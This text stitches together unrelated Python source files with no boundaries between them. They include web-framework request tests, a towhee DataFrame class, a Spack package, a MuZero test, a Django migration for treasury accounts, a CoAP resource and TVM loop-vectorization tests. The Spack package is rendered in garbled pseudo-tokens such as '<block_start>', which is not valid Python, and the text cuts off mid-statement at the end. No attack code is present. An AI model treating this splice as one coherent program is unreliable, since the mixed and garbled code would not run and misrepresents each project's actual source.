        ),
    ],
)
def test_get_request_absolute_url_to_path(scope, path, expected_result):
    request = incoming_request(scope)
    url_to = get_absolute_url_to_path(request, path)
    assert str(url_to) == expected_result


def test_can_set_request_host_and_scheme():
    scope = get_example_scope(
        "GET", "/blacksheep/", scheme="http", server=["127.0.0.1", 80]
    )
    request = incoming_request(scope)
    request.scheme = "https"
    request.host = "neoteroi.dev"
    absolute_url = get_request_absolute_url(request)
    assert str(absolute_url) == "https://neoteroi.dev/blacksheep/"


def test_can_set_request_client_ip():
    scope = get_example_scope(
        "GET", "/blacksheep/", scheme="http", server=["127.0.0.1", 80]
    )
    request = incoming_request(scope)
    # FIX: this was a bare `==` expression in the original and asserted nothing
    assert request.client_ip == scope["client"][0]
    assert request.original_client_ip == "127.0.0.1"
    # can set (e.g. when handling forwarded headers)
    request.original_client_ip = "192.168.127.12"
    assert request.original_client_ip == "192.168.127.12"
    # overriding the original client IP must not mutate the underlying scope
    assert scope["client"] == ("127.0.0.1", 51492)
# Copyright 2021 Zilliz. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import threading
from typing import Iterable, List, Tuple, Any

from towhee.dataframe.array import Array


class DataFrame:
    """A `DataFrame` is a collection of immutable, potentially heterogeneous blobs of data.

    Args:
        name (`str`):
            Name of the dataframe; `DataFrame` names should be the same as its
            representation.
        data (`list[towhee.Array]` or `list[Tuple]` or `dict[str, towhee.Array]`):
            The data of the `DataFrame`. Internally, the data will be organized
            in a column-based manner.
        columns (`list[str]`, optional):
            Column names; must match the number of columns in `data`.
    """

    def __init__(
        self,
        name: str = None,
        data=None,
        columns=None,
    ):
        self._name = name
        self._len = 0
        self._sealed = False
        self._lock = threading.Lock()

        # For `data` is empty
        if not data:
            # Robustness fix: an empty DataFrame previously left the column
            # containers unset, so `.data` / `__getitem__` raised AttributeError.
            self._data_as_list = []
            self._data_as_dict = None
        # For `data` is `list`
        elif isinstance(data, list):
            container_types = set(type(i) for i in data)
            if len(container_types) != 1:
                raise ValueError(
                    'can not construct Dataframe from a list of hybrid data containers. Try list[Tuple] or list[Array].')
            container_type = container_types.pop()

            # For `data` is `list[tuple]`
            if container_type is tuple:
                self._from_tuples(data, columns)
            # For `data` is `list[towhee.Array]`
            elif container_type is Array:
                self._from_arrays(data, columns)
            else:
                raise ValueError('can not construct DataFrame from list[%s]' % (container_type))
        # For `data` is `dict`
        elif isinstance(data, dict):
            self._from_dict(data)
        # Unrecognized data types
        else:
            raise ValueError('can not construct DataFrame from data type %s' % (type(data)))

    def __getitem__(self, key):
        """Row access by `int` index, column access by `str` column name."""
        # access a row
        if isinstance(key, int):
            return tuple(self._data_as_list[i][key] for i in range(len(self._data_as_list)))
        # access a column
        elif isinstance(key, str):
            return self._data_as_dict[key]
        # Previously fell through and returned None implicitly; raise instead.
        raise TypeError('DataFrame indices must be int (row) or str (column), not %s' % (type(key)))

    def __len__(self):
        return self._len

    @property
    def name(self) -> str:
        return self._name

    @property
    def data(self) -> List[Array]:
        # Column-ordered list of the underlying towhee.Array columns.
        return self._data_as_list

    def iter(self) -> Iterable[Tuple[Any, ...]]:
        """Iterate over DataFrame rows as tuples."""
        return DFIterator(self)

    def seal(self):
        """Mark the DataFrame as complete; no further rows will be appended."""
        with self._lock:
            self._sealed = True

    def is_sealed(self) -> bool:
        with self._lock:
            return self._sealed

    def _from_tuples(self, data, columns):
        """Build columns from a list of equal-length row tuples."""
        # check tuple length
        tuple_lengths = set(len(i) for i in data)
        if len(tuple_lengths) == 1:
            tuple_length = tuple_lengths.pop()
        else:
            raise ValueError('can not construct DataFrame from unequal-length tuples')

        # check columns length
        if columns and len(columns) != tuple_length:
            raise ValueError('length of columns is not equal to the length of tuple')

        # create arrays
        if columns:
            self._data_as_list = [Array(name=columns[i]) for i in range(tuple_length)]
            self._data_as_dict = {columns[i]: self._data_as_list[i] for i in range(tuple_length)}
        else:
            # Bug fix: `[Array()] * tuple_length` repeated ONE Array object, so
            # every column aliased the same storage and each row's elements all
            # landed in a single shared column. Create distinct Arrays instead.
            self._data_as_list = [Array() for _ in range(tuple_length)]
            self._data_as_dict = None

        # tuples to arrays
        for row in data:
            for i, element in enumerate(row):
                self._data_as_list[i].put(element)

        self._len = len(data)

    def _from_arrays(self, data, columns):
        """Adopt a list of pre-built, equal-length towhee.Array columns."""
        # check array length
        array_lengths = set(len(array) for array in data)
        if len(array_lengths) != 1:
            raise ValueError('arrays in data should have equal length')
        self._len = array_lengths.pop()

        # check columns length
        if columns and len(columns) != len(data):
            raise ValueError('length of columns is not equal to the number of arrays')

        self._data_as_list = data
        if columns:
            self._data_as_dict = {columns[i]: self._data_as_list[i] for i in range(len(data))}
        else:
            self._data_as_dict = None

    def _from_dict(self, data):
        """Adopt a mapping of column name -> towhee.Array."""
        # check dict values
        for value in data.values():
            if not isinstance(value, Array):
                raise ValueError('value type in data should be towhee.Array')

        # check arrays length
        array_lengths = set(len(array) for array in data.values())
        if len(array_lengths) != 1:
            raise ValueError('arrays in data should have equal length')
        self._len = array_lengths.pop()

        self._data_as_list = list(data.values())
        self._data_as_dict = data


class DFIterator:
    """A row-based `DataFrame` iterator."""

    def __init__(self, df: DataFrame):
        self._df = df
        self._offset = 0

    def __iter__(self):
        return self

    def __next__(self):
        """
        Returns:
            (`Tuple[Any, ...]`)
                In the normal case, the iterator will return a `Tuple` at each call.
            (`None`)
                In the case that the `DataFrame` is not sealed and the new rows are
                not ready yet, the iterator will return `None`. The caller should
                determine whether to block the iteration or exit the loop.
        Raises:
            (`StopIteration`)
                The iteration ends iff the `DataFrame` is sealed and the last row
                is reached.
        """
        if len(self._df) == self._offset:
            if self._df.is_sealed():
                # Already reached the last row
                raise StopIteration
            else:
                # No more ready rows
                return None
        else:
            row = self._df[self._offset]
            self._offset += 1
            return row

    def ack(self):
        """Notify the DataFrame that the iterated rows have been successfully processed.

        An acknowledgement (ack) tells the `DataFrame` that rows already iterated
        over are no longer used and can be deleted from the system.
        """
        pass
from rpython.jit.metainterp.test.test_list import ListTests
from rpython.jit.backend.aarch64.test.test_basic import JitAarch64Mixin


class TestList(JitAarch64Mixin, ListTests):
    # Runs the generic metainterp list tests through the AArch64 JIT backend;
    # the mixin supplies the backend, ListTests supplies the test bodies.
    # for individual tests see
    # ====> ../../../metainterp/test/test_list.py
    pass
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) <import_from_stmt>spack *<class_stmt>Pacparser(MakefilePackage)<block_start>"""pacparser is a library to parse proxy auto-config (PAC) files."""<line_sep>homepage="https://pacparser.github.io/"<line_sep>url="https://github.com/manugarg/pacparser/releases/download/1.3.7/pacparser-1.3.7.tar.gz"<line_sep>version('1.3.7' sha256='eb48ec2fc202d12a4b882133048c7590329849f32c2285bc4dbe418f29aad249')<line_sep>depends_on('python' when='+python')<line_sep>depends_on('py-setuptools' when='+python' type=('build' 'run'))<line_sep>variant('python' default=<false> description='Build and install python bindings')<def_stmt>build self spec prefix<block_start>make('-C' 'src')<if_stmt>'+python'<in>spec<block_start>make('-C' 'src' 'pymod')<block_end><block_end><def_stmt>install self spec prefix<block_start>make('-C' 'src' 'install' 'PREFIX='+self.prefix)<if_stmt>'+python'<in>spec<block_start>make('-C' 'src' 'install-pymod' 'PREFIX='+self.prefix 'EXTRA_ARGS=--prefix={0}'.format(prefix))<block_end><block_end><block_end>
def all_perms(str):
    """Generate every permutation of *str* (works for strings and lists).

    Recursive scheme: take all permutations of the tail, then yield each with
    the head element inserted at every possible position. Note: the parameter
    name shadows the builtin ``str`` but is kept for interface compatibility.
    """
    if len(str) <= 1:
        yield str
        return
    head = str[0:1]  # nb: a length-1 slice keeps the string/list type
    for tail_perm in all_perms(str[1:]):
        for pos in range(len(tail_perm) + 1):
            yield tail_perm[:pos] + head + tail_perm[pos:]
# std
from typing import Optional

# project
from src.chia_log.handlers.daily_stats.stats_manager import StatsManager
from src.chia_log.handlers.harvester_activity_handler import HarvesterActivityHandler
from src.chia_log.handlers.partial_handler import PartialHandler
from src.chia_log.handlers.block_handler import BlockHandler
from src.chia_log.handlers.finished_signage_point_handler import FinishedSignagePointHandler
from src.chia_log.handlers.wallet_added_coin_handler import WalletAddedCoinHandler
from src.chia_log.log_consumer import LogConsumerSubscriber, LogConsumer
from src.notifier.notify_manager import NotifyManager


class LogHandler(LogConsumerSubscriber):
    """Runs every registered log analyzer over incoming log chunks and forwards
    the resulting events to the notifier (for user notifications).

    Data flow: LogConsumer -> LogHandler -> Notifier

    Extending monitoring takes three steps:
      1. write a parser for the new part of the log stream,
      2. write a handler that analyzes the parsed information,
      3. register the handler class in the tuple below.
    """

    def __init__(self, log_consumer: LogConsumer, notify_manager: NotifyManager,
                 stats_manager: Optional[StatsManager] = None):
        self._notify_manager = notify_manager
        self._stats_manager = stats_manager
        handler_classes = (
            HarvesterActivityHandler,
            PartialHandler,
            BlockHandler,
            FinishedSignagePointHandler,
            WalletAddedCoinHandler,
        )
        self._handlers = [handler_cls() for handler_cls in handler_classes]
        # Register for log updates; consume_logs() will be invoked by the consumer.
        log_consumer.subscribe(self)

    def consume_logs(self, logs: str):
        # Each handler extracts its own events from the same log chunk.
        for analyzer in self._handlers:
            self._notify_manager.process_events(analyzer.handle(logs, self._stats_manager))
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Tests for muzero.core."""

import tensorflow as tf

from muzero import core


class CoreTest(tf.test.TestCase):
    """Tests MuZero training-target construction and value encoding."""

    def test_make_target(self):
        """make_target with td_steps=-1 (Monte-Carlo returns, no bootstrapping)."""
        num_unroll_steps = 3
        td_steps = -1
        rewards = [1., 2., 3., 4.]
        # Assume 4 different actions.
        policy_distributions = [
            [0.7, 0.1, 0.1, 0.1],
            [0.1, 0.7, 0.1, 0.1],
            [0.1, 0.1, 0.7, 0.1],
            [0.1, 0.1, 0.1, 0.7],
        ]
        discount = 0.9
        # Target rooted at the first state: every unroll step lies inside the
        # episode, so all masks (except the first reward) are 1.
        target = core.Episode.make_target(
            state_index=0,
            num_unroll_steps=num_unroll_steps,
            td_steps=td_steps,
            rewards=rewards,
            policy_distributions=policy_distributions,
            discount=discount)
        self.assertEqual(
            core.Target(
                value_mask=(1., 1., 1., 1.),
                reward_mask=(0., 1., 1., 1.),
                policy_mask=(1., 1., 1., 1.),
                # Discounted sums of the remaining rewards from each step.
                value=(rewards[0] + rewards[1] * discount
                       + rewards[2] * discount**2 + rewards[3] * discount**3,
                       rewards[1] + rewards[2] * discount + rewards[3] * discount**2,
                       rewards[2] + rewards[3] * discount,
                       rewards[3]),
                reward=(rewards[3], rewards[0], rewards[1], rewards[2]),
                visits=tuple(policy_distributions)),
            target)
        # Target rooted near the episode end: steps past the last state get
        # zero-masked values/policies and zero-padded rewards.
        target = core.Episode.make_target(
            state_index=2,
            num_unroll_steps=num_unroll_steps,
            td_steps=td_steps,
            rewards=rewards,
            policy_distributions=policy_distributions,
            discount=discount)
        self.assertEqual(
            core.Target(
                value_mask=(1., 1., 1., 1.),
                reward_mask=(0., 1., 1., 0.),
                policy_mask=(1., 1., 0., 0.),
                value=(rewards[2] + rewards[3] * discount,
                       rewards[3],
                       0.,
                       0.),
                reward=(rewards[1], rewards[2], rewards[3], 0.),
                # Out-of-episode policy slots are padded; padding appears to
                # reuse the first distribution — see core.Episode.make_target.
                visits=tuple(policy_distributions[2:] + [policy_distributions[0]] * 2)),
            target)

    def test_encode_decode(self):
        """Two-hot value encoding round-trips; values clip to [min, max]."""
        encoder = core.ValueEncoder(
            min_value=-2,
            max_value=2,
            num_steps=5,
            use_contractive_mapping=False)
        encoded = encoder.encode(tf.constant([-0.5, 0.9, 5.0]))
        # Each value is spread over the two adjacent support bins; 5.0 clips to 2.
        self.assertAllClose(
            [[0, 0.5, 0.5, 0, 0],
             [0, 0, 0.1, 0.9, 0],
             [0, 0, 0, 0, 1]],
            encoded)
        self.assertAllClose([-0.5, 0.9, 2.0], encoder.decode(encoded))
        encoder = core.ValueEncoder(
            min_value=-2,
            max_value=2,
            num_steps=5,
            use_contractive_mapping=True)
        encoded = encoder.encode(tf.constant([-0.5, 0.9, 5.0]))
        # Scaling transformation with contractive mapping
        self.assertAllClose(
            [[0, 0.61, 0.39, 0, 0],
             [0, 0, 0, 0.97, 0.03],
             [0, 0, 0, 0, 1]],
            encoded,
            atol=0.01)
        self.assertAllClose([-0.5, 0.9, 2.0], encoder.decode(encoded), atol=0.001)


if __name__ == '__main__':
    tf.test.main()
# MIT License # # Copyright (c) 2016 <NAME> aka kronenthaler # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # This is a backwards-compatibility file. For Unity developers this is the only file it needs to be added to the Unity # project. # This file will install the proper python package into the user's python's local space, if it's not present at run-time # of this script. Afterwards, it will import all necessary modules to the developer to make his/her own script work as # before. 
# Backwards-compatibility bootstrap: ensures the `pbxproj` package is installed
# into the user's site-packages and then re-exports its public names, so legacy
# scripts that did `from mod_pbxproj import ...` keep working.
from setuptools import setup

import importlib
import site

__author__ = 'kronenthaler'
__version__ = '2.0.1'
__package_name__ = 'mod_pbxproj_installer'

try:
    # check if the package is already importable
    from pbxproj import XcodeProject
except ImportError:
    # Bug fix: the original bare `except:` swallowed every exception (including
    # KeyboardInterrupt); only a missing package should trigger installation.
    # install it if not present
    print('Installing package...')
    setup(name=__package_name__,
          license='MIT License',
          install_requires=['pbxproj'],
          script_args=['install', '--user', '--force', '--record', '.uninstall_files'])

# force the refresh of the packages so the fresh install is visible.
# Bug fix: `reload` was a Python 2 builtin; on Python 3 it lives in importlib.
importlib.reload(site)

# import publicly
from pbxproj import *
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-10-11 16:17
from __future__ import unicode_literals

import django.db.models.deletion
from django.db import migrations, models

from usaspending_api.common.helpers.generic_helper import FY_PG_FUNCTION_DEF


# Initial migration for the accounts app. Creates the Treasury Account Symbol
# (TAS) schema: account balances (current and quarterly snapshots), budget
# authority amounts, federal accounts, and treasury appropriation accounts,
# plus the fiscal-year helper SQL function.
class Migration(migrations.Migration):

    initial = True

    dependencies = [
        ('submissions', '0001_initial'),
        ('references', '0001_initial'),
    ]

    operations = [
        # Per-submission balance snapshot for a treasury appropriation account.
        migrations.CreateModel(
            name='AppropriationAccountBalances',
            fields=[
                ('data_source', models.TextField(choices=[('USA', 'USAspending'), ('DBR', 'DATA Act Broker')], help_text='The source of this entry, either Data Broker (DBR) or USASpending (USA)', null=True)),
                ('appropriation_account_balances_id', models.AutoField(primary_key=True, serialize=False)),
                ('budget_authority_unobligated_balance_brought_forward_fyb', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
                ('adjustments_to_unobligated_balance_brought_forward_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
                ('budget_authority_appropriated_amount_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
                ('borrowing_authority_amount_total_cpe', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
                ('contract_authority_amount_total_cpe', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
                ('spending_authority_from_offsetting_collections_amount_cpe', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
                ('other_budgetary_resources_amount_cpe', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
                ('total_budgetary_resources_amount_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
                ('gross_outlay_amount_by_tas_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
                ('deobligations_recoveries_refunds_by_tas_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
                ('unobligated_balance_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
                ('status_of_budgetary_resources_total_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
                ('obligations_incurred_total_by_tas_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
                ('drv_appropriation_availability_period_start_date', models.DateField(blank=True, null=True)),
                ('drv_appropriation_availability_period_end_date', models.DateField(blank=True, null=True)),
                ('drv_appropriation_account_expired_status', models.TextField(blank=True, null=True)),
                ('drv_obligations_unpaid_amount', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
                ('drv_other_obligated_amount', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
                ('reporting_period_start', models.DateField(blank=True, null=True)),
                ('reporting_period_end', models.DateField(blank=True, null=True)),
                ('last_modified_date', models.DateField(blank=True, null=True)),
                ('certified_date', models.DateField(blank=True, null=True)),
                ('create_date', models.DateTimeField(auto_now_add=True, null=True)),
                ('update_date', models.DateTimeField(auto_now=True, null=True)),
                ('final_of_fy', models.BooleanField(db_index=True, default=False)),
                ('submission', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='submissions.SubmissionAttributes')),
            ],
            options={
                'db_table': 'appropriation_account_balances',
                'managed': True,
            },
        ),
        # Quarterly roll-up of the same balance figures.
        migrations.CreateModel(
            name='AppropriationAccountBalancesQuarterly',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('data_source', models.TextField(choices=[('USA', 'USAspending'), ('DBR', 'DATA Act Broker')], help_text='The source of this entry, either Data Broker (DBR) or USASpending (USA)', null=True)),
                ('budget_authority_unobligated_balance_brought_forward_fyb', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
                ('adjustments_to_unobligated_balance_brought_forward_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
                ('budget_authority_appropriated_amount_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
                ('borrowing_authority_amount_total_cpe', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
                ('contract_authority_amount_total_cpe', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
                ('spending_authority_from_offsetting_collections_amount_cpe', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
                ('other_budgetary_resources_amount_cpe', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
                ('total_budgetary_resources_amount_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
                ('gross_outlay_amount_by_tas_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
                ('deobligations_recoveries_refunds_by_tas_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
                ('unobligated_balance_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
                ('status_of_budgetary_resources_total_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
                ('obligations_incurred_total_by_tas_cpe', models.DecimalField(decimal_places=2, max_digits=23)),
                ('create_date', models.DateTimeField(auto_now_add=True, null=True)),
                ('update_date', models.DateTimeField(auto_now=True, null=True)),
                ('submission', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='submissions.SubmissionAttributes')),
            ],
            options={
                'db_table': 'appropriation_account_balances_quarterly',
                'managed': True,
            },
        ),
        migrations.CreateModel(
            name='BudgetAuthority',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('agency_identifier', models.TextField(db_index=True)),
                ('fr_entity_code', models.TextField(db_index=True, null=True)),
                ('year', models.IntegerField()),
                ('amount', models.BigIntegerField(null=True)),
            ],
            options={
                'db_table': 'budget_authority',
            },
        ),
        migrations.CreateModel(
            name='FederalAccount',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('agency_identifier', models.TextField(db_index=True)),
                ('main_account_code', models.TextField(db_index=True)),
                ('account_title', models.TextField()),
                ('federal_account_code', models.TextField(null=True)),
            ],
            options={
                'db_table': 'federal_account',
                'managed': True,
            },
        ),
        # One row per Treasury Account Symbol (TAS).
        migrations.CreateModel(
            name='TreasuryAppropriationAccount',
            fields=[
                ('data_source', models.TextField(choices=[('USA', 'USAspending'), ('DBR', 'DATA Act Broker')], help_text='The source of this entry, either Data Broker (DBR) or USASpending (USA)', null=True)),
                ('treasury_account_identifier', models.AutoField(primary_key=True, serialize=False)),
                ('tas_rendering_label', models.TextField(blank=True, null=True)),
                ('allocation_transfer_agency_id', models.TextField(blank=True, null=True)),
                ('agency_id', models.TextField()),
                ('beginning_period_of_availability', models.TextField(blank=True, null=True)),
                ('ending_period_of_availability', models.TextField(blank=True, null=True)),
                ('availability_type_code', models.TextField(blank=True, null=True)),
                ('availability_type_code_description', models.TextField(blank=True, null=True)),
                ('main_account_code', models.TextField()),
                ('sub_account_code', models.TextField()),
                ('account_title', models.TextField(blank=True, null=True)),
                ('reporting_agency_id', models.TextField(blank=True, null=True)),
                ('reporting_agency_name', models.TextField(blank=True, null=True)),
                ('budget_bureau_code', models.TextField(blank=True, null=True)),
                ('budget_bureau_name', models.TextField(blank=True, null=True)),
                ('fr_entity_code', models.TextField(blank=True, null=True)),
                ('fr_entity_description', models.TextField(blank=True, null=True)),
                ('budget_function_code', models.TextField(blank=True, null=True)),
                ('budget_function_title', models.TextField(blank=True, null=True)),
                ('budget_subfunction_code', models.TextField(blank=True, null=True)),
                ('budget_subfunction_title', models.TextField(blank=True, null=True)),
                ('drv_appropriation_availability_period_start_date', models.DateField(blank=True, null=True)),
                ('drv_appropriation_availability_period_end_date', models.DateField(blank=True, null=True)),
                ('drv_appropriation_account_expired_status', models.TextField(blank=True, null=True)),
                ('create_date', models.DateTimeField(auto_now_add=True, null=True)),
                ('update_date', models.DateTimeField(auto_now=True, null=True)),
                ('internal_start_date', models.DateField(blank=True, null=True)),
                ('internal_end_date', models.DateField(blank=True, null=True)),
                ('awarding_toptier_agency', models.ForeignKey(help_text='The toptier agency object associated with the ATA', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='tas_ata', to='references.ToptierAgency')),
                ('federal_account', models.ForeignKey(null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.FederalAccount')),
                ('funding_toptier_agency', models.ForeignKey(help_text='The toptier agency object associated with the AID', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='tas_aid', to='references.ToptierAgency')),
            ],
            options={
                'db_table': 'treasury_appropriation_account',
                'managed': True,
            },
        ),
        migrations.AlterUniqueTogether(
            name='federalaccount',
            unique_together=set([('agency_identifier', 'main_account_code')]),
        ),
        migrations.AlterUniqueTogether(
            name='budgetauthority',
            unique_together=set([('agency_identifier', 'fr_entity_code', 'year')]),
        ),
        # FKs added after model creation to break the circular dependency on
        # TreasuryAppropriationAccount.
        migrations.AddField(
            model_name='appropriationaccountbalancesquarterly',
            name='treasury_account_identifier',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='accounts.TreasuryAppropriationAccount'),
        ),
        migrations.AddField(
            model_name='appropriationaccountbalances',
            name='treasury_account_identifier',
            field=models.ForeignKey(db_column='treasury_account_identifier', on_delete=django.db.models.deletion.CASCADE, related_name='account_balances', to='accounts.TreasuryAppropriationAccount'),
        ),
        # Install the fiscal-year helper SQL function in the database.
        migrations.RunSQL(sql=[FY_PG_FUNCTION_DEF]),
    ]
from coapthon.resources.resource import Resource

__author__ = '<NAME>'


class RemoteResource(Resource):
    """A CoAP resource that stands in for a resource hosted on a remote server.

    Stores the remote server address and path alongside the normal Resource
    state; the actual forwarding is presumably done by the CoAP server using
    these attributes — TODO confirm against the server implementation.
    """

    def __init__(self, name, remote_server, remote_path, coap_server=None, visible=True, observable=True,
                 allow_children=True):
        # Initialize the base Resource with standard CoAP resource options.
        super(RemoteResource, self).__init__(name, coap_server, visible=visible, observable=observable,
                                             allow_children=allow_children)
        # Path of the resource on the remote server.
        self.remote_path = remote_path
        # Address/identifier of the remote server to forward to.
        self.remote_server = remote_server
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements.  See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership.  The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License.  You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied.  See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm


def test_vectorize_loop():
    """A vectorizable inner loop becomes a Ramp-indexed Broadcast store."""
    dtype = 'int64'
    n = tvm.var('n')
    ib = tvm.ir_builder.create()
    A = ib.pointer("float32", name="A")
    with ib.for_range(0, n) as i:
        with ib.for_range(0, 4, for_type="vectorize") as j:
            A[j] = tvm.const(1, A.dtype)
    stmt = ib.get()

    assert isinstance(stmt.body, tvm.stmt.For)
    stmt = tvm.ir_pass.VectorizeLoop(stmt)
    # Outer serial loop survives; inner vectorize loop is replaced by a single
    # vector store (Ramp index, Broadcast value).
    assert isinstance(stmt, tvm.stmt.For)
    assert not isinstance(stmt.body, tvm.stmt.For)
    assert isinstance(stmt.body.index, tvm.expr.Ramp)
    assert isinstance(stmt.body.value, tvm.expr.Broadcast)


def test_vectorize_vector():
    """Vectorization also works when the buffer element type is itself a vector."""
    dtype = 'int64'
    n = tvm.var('n')
    ib = tvm.ir_builder.create()
    A = ib.pointer("float32x4", name="A")
    with ib.for_range(0, n) as i:
        with ib.for_range(0, 4, for_type="vectorize") as j:
            A[j] = tvm.const(1, A.dtype)
    stmt = ib.get()
    assert isinstance(stmt.body, tvm.stmt.For)
    stmt = tvm.ir_pass.VectorizeLoop(stmt)
    assert isinstance(stmt, tvm.stmt.For)
    assert not isinstance(stmt.body, tvm.stmt.For)
    assert isinstance(stmt.body.index, tvm.expr.Ramp)
    assert isinstance(stmt.body.value, tvm.expr.Broadcast)


def test_vectorize_with_if():
    """A loop-invariant condition is hoisted; the i-dependent branch stays scalar."""
    n = tvm.var('n')
    x = tvm.var('x')
    ib = tvm.ir_builder.create()
    A = ib.pointer("float32", name="A")
    with ib.for_range(0, 4, for_type="vectorize") as i:
        with ib.if_scope(x < n):
            A[i] = A[i] + 1
        with ib.else_scope():
            with ib.if_scope(i < n):
                A[i] = 2.0
    stmt = ib.get()
    stmt = tvm.ir_pass.VectorizeLoop(stmt)
    # then-branch (condition independent of i) is vectorized ...
    assert isinstance(stmt, tvm.stmt.IfThenElse)
    assert isinstance(stmt.then_case.index, tvm.expr.Ramp)
    assert isinstance(stmt.then_case.value, tvm.expr.Add)
    assert stmt.then_case.value.dtype == "float32x4"
    # ... while the else-branch (condition depends on i) falls back to a loop.
    assert isinstance(stmt.else_case, tvm.stmt.For)


def test_vectorize_with_le_cond():
    """An i-dependent `<=` guard prevents vectorization (loop is kept)."""
    n = tvm.var('n')
    ib = tvm.ir_builder.create()
    A = ib.pointer("float32", name="A")
    with ib.for_range(0, 4, for_type="vectorize") as i:
        with ib.if_scope(i <= n):
            A[i] = A[i] + 1
    stmt = ib.get()
    stmt = tvm.ir_pass.VectorizeLoop(stmt)
    assert isinstance(stmt, tvm.stmt.For)


def test_vectorize_with_ge_cond():
    """An i-dependent `>=` guard prevents vectorization (loop is kept)."""
    n = tvm.var('n')
    ib = tvm.ir_builder.create()
    A = ib.pointer("float32", name="A")
    with ib.for_range(0, 4, for_type="vectorize") as i:
        with ib.if_scope(i >= n):
            A[i] = A[i] + 1
    stmt = ib.get()
    stmt = tvm.ir_pass.VectorizeLoop(stmt)
    assert isinstance(stmt, tvm.stmt.For)


def test_vectorize_if_then_else():
    """tvm_if_then_else with an i-dependent condition stays a loop; with a
    loop-invariant condition the body is vectorized (Broadcast operand)."""
    n = tvm.var('n')
    x = tvm.var('x')
    ib = tvm.ir_builder.create()
    A = ib.pointer("float32", name="A")
    with ib.for_range(0, 4, for_type="vectorize") as i:
        A[i] = tvm.call_intrin("float32", "tvm_if_then_else",
                               i > 0,
                               A[i] + 1,
                               A[i])
    stmt = ib.get()
    stmt = tvm.ir_pass.VectorizeLoop(stmt)
    assert isinstance(stmt, tvm.stmt.For)

    ib = tvm.ir_builder.create()
    A = ib.pointer("float32", name="A")
    with ib.for_range(0, n) as k:
        with ib.for_range(0, 4, for_type="vectorize") as i:
            A[k * 4 + i] = tvm.call_intrin("float32", "tvm_if_then_else",
                                           k > 0,
